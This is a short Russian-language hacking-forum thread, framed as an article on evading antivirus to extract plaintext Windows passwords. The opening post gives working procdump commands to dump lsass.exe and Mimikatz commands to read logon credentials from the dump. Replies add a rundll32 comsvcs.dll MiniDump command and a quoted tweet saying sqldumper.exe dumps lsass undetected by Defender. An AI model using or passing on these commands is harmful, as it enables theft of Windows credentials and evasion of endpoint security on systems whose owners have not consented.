Статья Обход антивирусного ПО для получения паролей Windows в открытом виде с помощью procdump+Mimikatz

[0x0021h]

procdump скачать на: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

sekurlsa::minidump lsass.dmp
 
sekurlsa::logonpasswords

 

[Whisper]

И какое АПО вам позволит такие шалости?

 

[penpen]

судя по скрину 2017 год же)

 

[Whisper]

судя по скрину 2017 год же)

Тоесть берем процдамп от 17го года и все ок. Сильное колдунство, впечатлен.

 

[penpen]

Тоесть берем процдамп от 17го года и все ок. Сильное колдунство, впечатлен.

Возвращаемся в 2017 со знаниями 2022)

 

[Whisper]

Возвращаемся в 2017 со знаниями 2022)

Там на скрине довольно свежий логон тайм если что - 2020 8 21.

 

[ibenji]

не все ав дают делать дамп, к примеру сентинель ,софос

 

[md2020]

Там на скрине довольно свежий логон тайм если что - 2020 8 21.

тебе WinDef сейчас не даст это сделать.
так же как и это:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\temp\lsass.dmp full

 

[Whisper]

тебе WinDef сейчас не даст это сделать.
так же как и это:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\temp\lsass.dmp full

Так и я о том же, что это какой то юмор, кто то даже лайкнул. Нынче лсассы добываются приватными инструментами.

 

[Expl0it]

Здесь главная особенность тягостные процессы

 

[N01L]

Возвращаемся в 2017 со знаниями 2022)

ага и с софтом с 22

 

[xrahitel]

https://twitter.com/x/status/1460597833917251595

 

[c0re]

Does this method work on Windows Server 2019 as well?>

 

[Lipshitz]

https://twitter.com/x/status/1460597833917251595

Procdump dump lsass
Defender: Threat detected!

Sqldumper dump lsass
Defender: Sure, go right ahead!

btw dumping lsass with sqldumper.exe is not new, actually its quite old. https://t.co/Q6HCfHeDJX pic.twitter.com/2ZPe5Qms09

— mr.d0x (@mrd0x) December 16, 2021

mr.d0x has been a hero of mine for a while now